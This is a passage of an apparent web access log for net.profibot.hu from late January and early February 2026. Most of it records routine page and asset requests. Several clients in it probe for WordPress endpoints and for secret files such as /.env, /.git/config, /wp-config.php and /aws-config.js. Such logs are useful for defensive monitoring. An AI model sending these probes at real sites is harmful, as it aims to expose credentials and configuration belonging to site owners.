+0000] - 200 200 - GET https net.profibot.hu "/images/favicon/apple-touch-icon.png" [Client 84.254.106.197] [Length 16709] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:22:52:59 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-16x16.png" [Client 84.254.106.197] [Length 1512] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:22:52:59 +0000] - 200 200 - GET https net.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:22:52:59 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 84.254.106.197] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:22:52:59 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/safari-pinned-tab.svg" [Client 84.254.106.197] [Length 5718] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:22:52:59 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 84.254.106.197] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:22:52:59 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 84.254.106.197] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:22:52:59 +0000] - 200 200 - GET https net.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:00:42:22 +0000] - - 301 - GET http net.profibot.hu "/" [Client 208.84.101.66] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:23 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:23 +0000] - 200 200 - GET https net.profibot.hu "//wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:23 +0000] - 200 200 - GET https net.profibot.hu "//xmlrpc.php?rsd" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:23 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:23 +0000] - 200 200 - GET https net.profibot.hu "//blog/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:24 +0000] - 200 200 - GET https net.profibot.hu "//web/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:24 +0000] - 200 200 - GET https net.profibot.hu "//wordpress/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:24 +0000] - 200 200 - GET https net.profibot.hu "//website/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:24 +0000] - 200 200 - GET https net.profibot.hu "//wp/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:24 +0000] - 200 200 - GET https net.profibot.hu "//news/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:24 +0000] - 200 200 - GET https net.profibot.hu "//2018/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:24 +0000] - 200 200 - GET https net.profibot.hu "//2019/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:24 +0000] - 200 200 - GET https net.profibot.hu "//shop/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:25 +0000] - 200 200 - GET https net.profibot.hu "//wp1/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:25 +0000] - 200 200 - GET https net.profibot.hu "//test/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:25 +0000] - 200 200 - GET https net.profibot.hu "//media/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:25 +0000] - 200 200 - GET https net.profibot.hu "//wp2/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:25 +0000] - 200 200 - GET https net.profibot.hu "//site/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:25 +0000] - 200 200 - GET https net.profibot.hu "//cms/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:25 +0000] - 200 200 - GET https net.profibot.hu "//sito/wp-includes/wlwmanifest.xml" [Client 208.84.101.66] [Length 1451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[01/Feb/2026:00:42:26 +0000] - - 400 - - https net.profibot.hu "-" [Client 208.84.101.66] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[01/Feb/2026:03:33:28 +0000] - 200 200 - HEAD https net.profibot.hu "/" [Client 193.19.82.13] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[01/Feb/2026:03:33:53 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 193.19.82.13] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[01/Feb/2026:03:47:00 +0000] - 200 200 - GET https net.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" "-" +[01/Feb/2026:05:13:54 +0000] - 200 200 - GET https net.profibot.hu "/.git/config" [Client 13.221.138.121] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/.env" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/.env" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/%22/assets/index-Bjey8ZS4.js%22" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/.env.save" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 195.178.110.132] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/backend/.env" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/admin/.env" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/.git/config" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/wp-config.php" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/wp-config.php.old" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/config.php" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/config.php.bak" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/config.js" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/aws-config.js" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:08:52 +0000] - 200 200 - GET https net.profibot.hu "/aws.config.js" [Client 195.178.110.132] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:58:14 +0000] - 200 200 - HEAD https net.profibot.hu "/" [Client 193.19.82.13] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[01/Feb/2026:06:58:28 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 193.19.82.13] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[01/Feb/2026:07:57:03 +0000] - - 301 - GET http net.profibot.hu "/wp-login.php" [Client 165.22.27.210] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0" "-" +[01/Feb/2026:07:57:03 +0000] - 200 200 - GET https net.profibot.hu "/wp-login.php" [Client 165.22.27.210] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0" "-" +[01/Feb/2026:09:15:35 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 45.148.10.238] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 8.1.0; Mi Note 3 Build/OPM1.171019.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.3396.87 XWEB/882 MMWEBSDK/190505 Mobile Safari/537.36 MMWEBID/358 MicroMessenger/7.0.5.1440(0x27000537) Process/tools NetType/4G Language/zh_CN" "-" +[01/Feb/2026:09:15:47 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 45.148.10.238] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1" "-" +[01/Feb/2026:09:15:47 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/browserconfig.xml" [Client 45.148.10.238] [Length 262] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36" "-" +[01/Feb/2026:09:16:00 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 45.148.10.238] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Links (2.1pre15; Linux 2.4.26 i686; 158x61)" "-" +[01/Feb/2026:09:16:00 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/browserconfig.xml" [Client 45.148.10.238] [Length 262] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 8.1.0; SM-J530F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[01/Feb/2026:09:16:12 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/browserconfig.xml" [Client 45.148.10.238] [Length 262] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1" "-" +[01/Feb/2026:09:16:12 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 45.148.10.238] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" "-" +[01/Feb/2026:09:20:09 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 149.88.100.207] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[01/Feb/2026:09:20:09 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 149.88.100.207] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:10 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-7pxQYCJT.css" [Client 149.88.100.207] [Length 543672] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:11 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 149.88.100.207] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:12 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 149.88.100.207] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:12 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 149.88.100.207] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:12 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-swCRRsQW.css" [Client 149.88.100.207] [Length 28] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:12 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-gE2qX1Ef.js" [Client 149.88.100.207] [Length 2475] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[01/Feb/2026:09:20:12 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-text-horizontal-grey.png" [Client 149.88.100.207] [Length 22203] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:18 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 217.138.216.149] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[01/Feb/2026:09:20:18 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 217.138.216.149] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:18 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-7pxQYCJT.css" [Client 217.138.216.149] [Length 543672] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:18 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 217.138.216.149] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:19 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 217.138.216.149] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:19 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 217.138.216.149] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:19 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-swCRRsQW.css" [Client 217.138.216.149] [Length 28] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:09:20:19 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-gE2qX1Ef.js" [Client 217.138.216.149] [Length 2475] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[01/Feb/2026:09:20:19 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-text-horizontal-grey.png" [Client 217.138.216.149] [Length 22203] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[01/Feb/2026:10:27:44 +0000] - - 301 - GET http net.profibot.hu "/" [Client 136.117.109.219] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[01/Feb/2026:10:27:44 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 136.117.109.219] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://net.profibot.hu" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/apple-touch-icon.png" [Client 84.254.106.197] [Length 16709] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 84.254.106.197] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 84.254.106.197] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/safari-pinned-tab.svg" [Client 84.254.106.197] [Length 5718] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[01/Feb/2026:10:48:43 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 84.254.106.197] [Length 458] [Gzip -] 